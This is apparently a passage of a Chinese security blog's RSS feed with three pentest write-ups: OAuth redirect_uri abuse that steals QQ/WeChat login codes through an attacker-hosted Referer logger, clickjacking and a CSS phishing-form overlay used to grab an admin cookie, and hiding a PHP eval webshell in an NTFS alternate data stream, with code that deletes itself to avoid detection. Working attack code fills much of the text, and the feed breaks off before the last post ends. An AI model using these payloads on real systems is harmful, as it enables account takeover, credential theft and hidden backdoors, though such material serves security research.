&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;1 Response：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;HTTP/1.1 302 Moved Temporarily
Server: tws
Date: Fri, 09 Feb 2018 11:50:42 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=50
Content-Encoding: gzip
Location: http:/a.com/?uuid=65392bc3fc724fca8dcba23558f67ec8&amp;amp;code=120ED71CAECB11BAD538820E12B54664
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;Request 2：&lt;/strong&gt;(这个请求表示根据参数&lt;strong&gt;code&lt;/strong&gt;的值进行个人用户凭证生成)&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;GET /?uuid=65392bc3fc724fca8dcba23558f67ec8&amp;amp;code=120ED71CAECB11BAD538820E12B54664 HTTP/1.1
Host: a.com
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;2 Response：&lt;/strong&gt;（setcookie返回用户凭证）&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Connection: close
Set-Cookie: 用户凭证
Location: https://www.a.com/
Cache-Control: max-age=0
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这时候我们就可以注意到问题了，请求1产生了一个链接，其就是QQ登陆的地址中的参数&lt;strong&gt;redirect_uri&lt;/strong&gt;附带上&lt;strong&gt;参数code的值&lt;/strong&gt;，而这个链接是生成用户凭证的，所以链接中的&lt;strong&gt;参数code&lt;/strong&gt;也是至关重要的，看到这里我的攻击思路已经产生了：&lt;/p&gt;

&lt;p&gt;假设QQ登陆的地址中的参数&lt;strong&gt;redirect_uri&lt;/strong&gt;的值可以为我的网站，那么只要用户A点击我就可以根据网站日志访问记录获取参数&lt;strong&gt;code&lt;/strong&gt;的值再根据请求2获取用户A在 http://a.com 的账号权限。&lt;/p&gt;

&lt;p&gt;理想很好，现实残酷：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x02.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里QQ做了限制，我不需要去分析QQ关联的全部流程就能知道这里的参数client_id，其实就是 http://a.com 的QQ互联的服务id， http://graph.qq.com 根据client_id获取 http://a.com 的设置允许的参数&lt;strong&gt;redirect_uri&lt;/strong&gt;的值再跟你输入的参数&lt;strong&gt;redirect_uri&lt;/strong&gt;的值进行比较。&lt;/p&gt;

&lt;p&gt;这时候我只需要对参数&lt;strong&gt;redirect_uri&lt;/strong&gt;进行Fuzz就能知道哪些范围是允许的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x03.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;http://a.com 的二级子域名可以为参数&lt;strong&gt;redirect_uri&lt;/strong&gt;的值，目前我需要解决的就是如何根据 http://a.com 的二级子域名获取到code的值：&lt;/p&gt;

&lt;h1 id=&quot;1我有一个html注入漏洞&quot;&gt;&lt;strong&gt;1.我有一个HTML注入漏洞&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;漏洞地址：&lt;code&gt;http://1.a.com/?xss=%3Cimg%20src=&quot;http://www.evilchen.cn/getref.php&quot;%3E&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;getref.php的内容为如下PHP代码：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;?php
file_put_contents(&quot;ref.txt&quot;, $_SERVER[&apos;HTTP_REFERER&apos;]);
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;将漏洞地址作为参数&lt;strong&gt;redirect_uri&lt;/strong&gt;的值，然后诱导用户A点击登陆，这时候跳转的链接就变成了：&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;http://1.a.com/?xss=%3Cimg%20src=”http://www.evilchen.cn/getref.php”%3E&amp;amp;code=120ED71CAECB11BAD538820E12B54664&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;跳转之后这个链接会做为HTTP Referer的值再请求[http://www.evilchen.cn/getref.php]，那么我的服务器就会接收到code的值，再根据Request 2的值填入，我就可以获取用户A在a.com的账号权限了&lt;/p&gt;

&lt;h1 id=&quot;2我能在其他地方引用外部资源&quot;&gt;&lt;strong&gt;2.我能在其他地方引用外部资源&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x04.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;很多厂商都会有社区、论坛等功能，大部分会使用Discuz程序来做，而Discuz确实可以引用外部资源~&lt;/p&gt;

&lt;p&gt;这里我使用的图片地址还是 http://www.evilchen.cn/getref.php 然后进行帖子回复。&lt;/p&gt;

&lt;p&gt;帖子地址为 http://bbs.a.com/thread-123-1-1.html 将帖子地址作为参数&lt;strong&gt;redirect_uri&lt;/strong&gt;的值，然后诱导用户A点击登陆，这时候跳转的链接就变成了：&lt;/p&gt;

&lt;p&gt;http://bbs.a.com/thread-123-1-1.html?code=120ED71CAECB11BAD538820E12B54664&lt;/p&gt;

&lt;p&gt;跳转之后这个链接会做为HTTP Referer的值再请求 http://www.evilchen.cn/getref.php 那么我的服务器就会接收到code的值，再根据Request 2的值填入，我就可以获取用户A在a.com的账号权限了：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x05.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;攻击流程&quot;&gt;&lt;strong&gt;攻击流程&lt;/strong&gt;&lt;/h1&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;我点击&lt;code&gt;http://a.com&lt;/code&gt;的QQ登录，获取QQ快捷登录链接，替换redirect_uri的值为如上两个问题的地址然后发送给受害者&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;受害者点击QQ头像登录，会跳转到redirect_uri的值(链接)，并且携带上code的值&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;受害者浏览器以跳转后的链接作为referer头请求外链图片(php)&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;攻击者获取referer的值，构建B地址，并且进入链接(注意 攻击者要在未登录情况下)&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h1 id=&quot;微信快捷登陆流程&quot;&gt;&lt;strong&gt;微信快捷登陆流程&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;开发平台：https://open.weixin.qq.com/&lt;/p&gt;

&lt;p&gt;http://a.com的地址如下：&lt;/p&gt;

&lt;p&gt;https://open.weixin.qq.com/connect/qrconnect?appid=&amp;amp;redirect_uri=http://a.com/wx?callback=null&lt;/p&gt;

&lt;p&gt;微信扫描后会跳转到：&lt;/p&gt;

&lt;p&gt;http://a.com/weixin?callback=null&amp;amp;code=021n2XAB00C4mg2FvKyB0W7QAB0n2XAF&lt;/p&gt;

&lt;p&gt;而只要利用QQ快捷登陆的方法我们一样可以获取到code的值&lt;/p&gt;

&lt;h1 id=&quot;攻击流程-1&quot;&gt;&lt;strong&gt;攻击流程&lt;/strong&gt;&lt;/h1&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;我点击&lt;code&gt;http://a.com&lt;/code&gt;的微信登录，获取微信快捷登录链接，替换redirect_uri的值为如上两个问题的地址然后发送给受害者&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;受害者点开微信扫描，会跳转到redirect_uri的值(链接)，并且携带上code的值&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;受害者浏览器以跳转后的链接作为referer头请求外链图片(php)&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;攻击者获取referer的值，构建B地址，并且进入链接(注意 攻击者要在未登录情况下)&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h1 id=&quot;风险检测&quot;&gt;&lt;strong&gt;风险检测&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;我简单的写了个poc，仅仅做风险检测，具体危害可以自行检查~~（&lt;strong&gt;PS：支持微信跟QQ的快捷登陆风险检测&lt;/strong&gt;）&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;# -*- coding:utf-8 -*-
# Name: QQ and WeChat OAuth2.0 PoC
# Auther: EvilChen

import requests,urlparse,urllib

def scan(url):
	url = urllib.unquote(url)
	tempUrl = getValue(url)
	tempDomain = urlparse.urlparse(tempUrl).netloc
	domainA = tempDomain.split(&apos;.&apos;)
	domainB = tempDomain.replace(domainA[0],&quot;mstlab&quot;)
	url = url.replace(tempUrl,&quot;http://&quot; + domainB)
	r = requests.get(url)
	# print url
	if (&quot;redirect uri is illegal&quot; in r.text) or (&quot;&amp;gt;redirect_uri&quot; in r.text):
	    print &quot;[*] This Website is safe.&quot;
	else:
            print &quot;[*] This Website is vulnerable!&quot;

def getValue(url):
    query = urlparse.urlparse(url).query
    resUrl = dict([(k,v[0]) for k,v in urlparse.parse_qs(query).items()])[&apos;redirect_uri&apos;]
    return resUrl

if __name__ == &apos;__main__&apos;:
	url = raw_input(&quot;URL: &quot;)
	scan(url)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;poc的使用方法很简单，只需要复制QQ和微信快捷登陆的链接：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x06.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;经过我们实验室的排查发现存在风险的厂商如下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x07.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;等国内知名厂商近百家都存在此危害。&lt;/p&gt;

&lt;h1 id=&quot;修复建议&quot;&gt;&lt;strong&gt;修复建议&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;redirect_uri的值做限制&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;&lt;strong&gt;结尾&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;文章参考：&lt;/p&gt;

&lt;p&gt;http://wooyun.jozxing.cc/search?keywords=OAuth&amp;amp;content_search_by=by_bugs&lt;/p&gt;

&lt;p&gt;http://www.cnvd.org.cn/flaw/show/CNVD-2014-02785&lt;/p&gt;

&lt;p&gt;http://www.cnvd.org.cn/flaw/show/CNVD-2018-01622&lt;/p&gt;
</description>
          <pubDate>2018-02-12T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-02-12/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-02-12/1</guid>
        </item>
      
    
      
        <item>
          <title>鸡肋点搭配ClickJacking攻击-获取管理员权限</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;有一段时间没做测试了，偶尔的时候也会去挖挖洞。本文章要写的东西是我利用&lt;code&gt;ClickJacking&lt;/code&gt;拿下管理员权限的测试过程。但在说明过程之前，先带大家了解一下&lt;code&gt;ClickJacking&lt;/code&gt;的&lt;strong&gt;基本原理以及简单的漏洞挖掘&lt;/strong&gt;。&lt;/p&gt;

&lt;h1 id=&quot;clickjacking&quot;&gt;ClickJacking&lt;/h1&gt;

&lt;p&gt;ClickJacking背景说明:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;ClickJacking（点击劫持）是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼在2008年首创的。
ClickJacking是一种视觉欺骗攻击手段，在web端就是iframe嵌套一个透明不可见的页面，让用户在不知情(被欺骗)的情况下，点击攻击者想要欺骗用户点击的位置。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;说道视觉欺骗，相信有&lt;code&gt;炫技&lt;/code&gt;经验的朋友们一定会想到，自己一个后台拿不下Webshell权限的时候，而想要黑掉首页从而达到炫技，使用的是什么呢？没错一般使用CSS样式表来劫持首页以造成黑掉的假象~&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;table style=&quot;left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;&quot;&amp;gt;&amp;lt;tbody&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=&quot;color:#FFFFFF;z-index: 6000;vertical-align:top;&quot;&amp;gt;&amp;lt;h1&amp;gt;hacked by key&amp;lt;/h1&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/tbody&amp;gt;&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-12-20/0x00.png&quot; alt=&quot;CSS jacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;除了可以炫技，CSS劫持可以做的东西也有很多：例如经典的form表单钓鱼攻击&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;table+style=&quot;left:+0px;+top:+0px;+position:+fixed;z-index:+5000;position:absolute;width:100%;background-color:white;&quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;form action=&quot;http://192.168.0.109/login.php&quot; method=&quot;post&quot;&amp;gt;账号：&amp;lt;input type=&quot;text&quot; name=&quot;name&quot;&amp;gt;&amp;lt;br&amp;gt;密码：&amp;lt;input type=&quot;password&quot; name=&quot;pwd&quot;&amp;gt;&amp;lt;br&amp;gt;&amp;lt;input type=&quot;submit&quot; value=&quot;登陆&quot;&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-12-20/0x01.png&quot; alt=&quot;CSS jacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里就不对代码的意思进行解读了，可以看到CSS劫持达到的视觉欺骗攻击效果还是比较LOW的，因为这样的攻击手段偏被动式。而我要说的点击劫持其实也算是被动式，不过相对来说比较容易获得信任让被动式触发，这里只是单单对攻击手法谁的成功率比较高作为比较&lt;/p&gt;

&lt;p&gt;前面背景介绍的时候说了，点击劫持攻击其实就是镶嵌一个iframe框架(&lt;strong&gt;存在点击劫持漏洞的页面&lt;/strong&gt;)在页面上，然后再把其修改为透明的样式。这样的操作只是造成了视觉欺骗，还没达到欺骗点击的效果，所以就需要知道iframe框架其按钮的位置，然后在基于透明层模拟一个位置大小相同的按钮，发给用户让其点击~~&lt;/p&gt;

&lt;p&gt;这里以QQ安全中心的一个点击劫持为例，作为一个QQ的资深用户应该知道QQ是有安全中心紧急冻结QQ服务的，只要登录自己的安全中心就可以冻结，&lt;strong&gt;地址(漏洞地址，目前漏洞已经修复)&lt;/strong&gt;为：&lt;a href=&quot;https://aq.qq.com/cn2/message_center/wireless/wireless_seal_auth?source_id=2985&quot;&gt;https://aq.qq.com/cn2/message_center/wireless/wireless_seal_auth?source_id=2985&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-12-20/0x02.png&quot; alt=&quot;QQ Click Jacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;一点击，你的QQ就被会冻结(当时不知道逗了多少人~)，那这样怎么利用呢？&lt;/p&gt;

&lt;p&gt;1.建立iframe框架:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;iframe id=&quot;frame&quot; src=&quot;https://aq.qq.com/cn2/message_center/wireless/wireless_seal_auth?source_id=2985&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;2.建立iframe的CSS样式:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-css&quot;&gt;#frame {
    border: 0px; /*边框属性为0*/
    height: 100%; /*框架高度100%*/
    width: 100%; /*框架宽度100%*/
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;3.获取iframe框架引用的原页面的按钮位置和大小:&lt;/p&gt;

&lt;p&gt;大小直接通过审查元素可以看得到:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-12-20/0x03.png&quot; alt=&quot;QQ Click Jacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;现在要获取的就是按钮元素到浏览器顶部的距离，这里通过&lt;code&gt;id.offsetTop&lt;/code&gt;有些时候是无法直接获取的:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;&amp;gt;&amp;gt;span_verify.offsetTop
←16&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;获取到的是16~很醉，所以使用如下的方法直接获取:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;document.getElementById(&apos;span_verify&apos;).getBoundingClientRect().top
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-12-20/0x04.png&quot; alt=&quot;QQ Click Jacking&quot; /&gt;
4.建立按钮:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;input type=&quot;button&quot; class=&quot;button&quot; value=&quot;Click&quot; /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;5.根据第三步骤获取到的建立按钮样式:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-css&quot;&gt;.button {
    position: fixed;
    width: 100%;
    height: 42px;
    margin: 0 auto;
    left: 0;
    right: 0;
    display: block;
    top: 278px;
} 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;6.散播，用户中招:
&lt;img src=&quot;/images/2017-12-20/0x05.png&quot; alt=&quot;QQ Click Jacking&quot; /&gt;
&lt;img src=&quot;/images/2017-12-20/0x06.png&quot; alt=&quot;QQ Click Jacking&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;一次点击劫持攻击案例&quot;&gt;一次点击劫持攻击案例&lt;/h2&gt;

&lt;p&gt;说了这么多，在前几天的测试中我是如何拿到管理员权限呢？挖掘到一处self-xss，这里先说明下self-xss可以理解为只能攻击myself~&lt;/p&gt;

&lt;p&gt;发现流程:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;发现输入框-&amp;gt;秉着见框就X的原理插入XSS Payload-&amp;gt;弹框-&amp;gt;发现成功&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;然而获取到的URL链接是&lt;code&gt;/?keyword=&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/code&gt;，但是不是xss，keyword的值显示在输入框内，需要你再点击&lt;code&gt;搜索标题按钮&lt;/code&gt;才可以触发漏洞。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;形成的攻击思路-&amp;gt;iframe嵌套漏洞URL链接-&amp;gt;Click Jacking攻击页面构造-&amp;gt;通过留言给管理员引诱触发&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-12-20/0x07.png&quot; alt=&quot;Click Jacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;攻击页面构造流程其实耐心读到这里的朋友已经是非常明确步骤了:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;建立iframe框架-&amp;gt;建立iframe框架CSS样式-&amp;gt;获取按钮位置大小-&amp;gt;建立按钮-&amp;gt;建立按钮CSS样式-&amp;gt;留言板留言外网攻击链接-&amp;gt;获取管理员Cookie-&amp;gt;Cookie伪造进入后台&lt;/strong&gt;&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;一次很有意思的实践，让自己满满的成就感，同时也完成了项目任务~&lt;/p&gt;
</description>
          <pubDate>2017-12-20T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2017-12-20/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2017-12-20/1</guid>
        </item>
      
    
      
        <item>
          <title>文件寄生——NTFS文件流实际应用</title>
          <description>&lt;h1 id=&quot;what-is-ntfs文件流&quot;&gt;What is NTFS文件流&lt;/h1&gt;

&lt;p&gt;NTFS文件系统实现了多文件流特性，NTFS环境一个文件默认使用的是&lt;strong&gt;未命名的文件流&lt;/strong&gt;，同时可创建其他命名的文件流，windows资源管理器默认不显示出文件的命名文件流，这些命名的文件流在功能上和默认使用的未命名文件流一致，甚至可以用来启动程序。&lt;/p&gt;

&lt;h2 id=&quot;ntfs文件流生成步骤&quot;&gt;NTFS文件流生成步骤&lt;/h2&gt;

&lt;p&gt;我们在任意一个NTFS分区下打开CMD命令提示符，输入&lt;code&gt;echo mstlab&amp;gt;&amp;gt;mst.txt:test.txt&lt;/code&gt;，则在当前目录下会生成一个名为mst.txt的文件，但文件的大小为0字节，打开后也无任何内容。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/0.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;只有输入命令：notepad mst.txt:test.txt 才能看见写入的mstlab&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/1.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在上边的命令中，mst.txt可以不存在，也可以是某个已存的文件，文件格式无所谓，无论是.txt还是.jpg|.exe|.asp都行b.txt也可以任意指定文件名以及后缀名。（可以将任意文本信息隐藏于任意文件中，只要不泄露冒号后的虚拟文件名(即test.txt)，别人是根本不会查看到隐藏信息的）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/2.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;包含隐藏信息的文件仍然可以继续隐藏其它的内容，对比上例，我们仍然可以使用命令&lt;code&gt;echo 
mstlab1&amp;gt;&amp;gt;mst.txt:test1.txt&lt;/code&gt;给mst.txt建立新的隐藏信息的流文件，使用命令&lt;code&gt;notepad 
mst.txt:test1.txt&lt;/code&gt;打开后会发现mstlab1这段信息，而mstlab仍然存在于mst.txt:test.txt中丝毫不受影响&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/3.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;所以这里的宿主mst.txt成功的被test.txt和test1.txt所寄生，而在这里的微妙关系显而易见，宿主消失寄生消失。&lt;/p&gt;

&lt;h2 id=&quot;ntfs特性和原理分析&quot;&gt;NTFS特性和原理分析&lt;/h2&gt;

&lt;h3 id=&quot;特性1&quot;&gt;特性1&lt;/h3&gt;

&lt;p&gt;实验工具下载：&lt;a href=&quot;http://link.zhihu.com/?target=https%3A//github.com/wangyongxina/filestreams/blob/master/Release/Release.7z&quot;&gt;https://github.com/wangyongxina/filestreams/blob/master/Release/Release.7z&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;工具使用说明：&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;create      创建文件流&lt;/p&gt;

  &lt;p&gt;enum       列举文件流&lt;/p&gt;

  &lt;p&gt;delete      删除文件流&lt;/p&gt;

  &lt;p&gt;write       写入内容到文件流&lt;/p&gt;

  &lt;p&gt;append     增加文件到文件流&lt;/p&gt;

  &lt;p&gt;launch      执行文件流的内容&lt;/p&gt;

  &lt;p&gt;dump       读取文件流的内容&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;我们让上一步骤归零，重新来看看mst.txt：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/4.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;而这里的default文件流就验证了最开头的一句话，默认使用的是为命名的文件流。&lt;/p&gt;

&lt;p&gt;实验开始，首先我们使用FileStreams.exe创建一个文件流vkey：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;FileStreams.exe create mst.txt vkey
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;然后写入内容到文件流vkey：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;FileStreams.exe write mst.txt vkey content
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/5.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;再来查看文件流vkey的内容：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;FileStreams.exe dump mst.txt vkey 14 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这里的14从何而来，相信聪明的你们能明白。（文件流vkey大小 14）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/6.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;最开始也说了，文件流是可以用来启动程序的，我们来试试：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;加入文件到文件流vkey：&lt;/p&gt;

    &lt;p&gt;&lt;code&gt;FileStreams.exe append mst.txt vkey C:\Users\gh0stkey\Desktop\test\FileStreams.exe&lt;/code&gt;&lt;/p&gt;

    &lt;p&gt;&lt;img src=&quot;/images/2017-03-29/7.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;查看文件流vkey的内容，这里就看前100个字节的内容：&lt;/p&gt;

    &lt;p&gt;&lt;code&gt;FileStreams.exe dump mst.txt vkey 100&lt;/code&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/8.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;执行文件流vkey：&lt;/p&gt;

    &lt;p&gt;顺利的执行了 &lt;code&gt;C:\Users\gh0stkey\Desktop\test\FileStreams.exe&lt;/code&gt; 这个文件。&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/9.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;特性2&quot;&gt;特性2&lt;/h3&gt;

&lt;p&gt;自动创建空文件：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/10.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;自动创建宿主，然后寄生。&lt;/p&gt;

&lt;p&gt;在没有原文件的情况下创建文件流，会自动创建一个空文件。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;原理分析：&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;好，现在我们以及初步了解了文件流的特性。再来看看NTFS文件流实现原理：&lt;/p&gt;

&lt;p&gt;如文件大小，文件创建时间，文件修改时间，文件名，文件内容等被组织成属性来存放，NTFS定义了一序列的文件属性：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/11.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;详细说明可以搜索NTFS3G，这些属性统一组织在NTFS的MFT（Master File 
Table）上，每个MFT大小1024个字节，MFT的$DATA属性即是前面提到的文件流，通常来说包含多个不同名字的$DATA属性即说明该文件存在多个文件流，下图是winhex打开1.txt定位到1.txt的MFT，我们实际看一下NTFS是如何组织的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/12.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;pentesting-with-ntfs&quot;&gt;Pentesting With NTFS&lt;/h2&gt;

&lt;h3 id=&quot;webshell后门隐藏&quot;&gt;Webshell后门隐藏&lt;/h3&gt;

&lt;p&gt;写一个PHP的Webshell，首先网站的默认首页是index.php，所以使用了第一段代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;exec(&apos;echo &quot;&amp;lt;?php @eval($_POST[key]);?&amp;gt;&quot;&amp;gt;&amp;gt;index.php:key.php&apos;);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;直接写一个一句话内容到key.php这个文件流中。 
其次，文件流是不可能直接执行的，但是PHP可以使用包含函数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$key = &amp;lt;&amp;lt;&amp;lt;key 
echo &quot;&amp;lt;?php include &apos;index.php:key.php&apos;;?&amp;gt;&quot;&amp;gt;&amp;gt;a.php 
key; 
exec($key); 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;最后，为了不被发现要删除本身文件：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$url = $_SERVER[&apos;PHP_SELF&apos;]; 
$filename= substr($url,strrpos($url,&apos;/&apos;)+1); 
@unlink($filename); 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;最终代码：&lt;/p&gt;

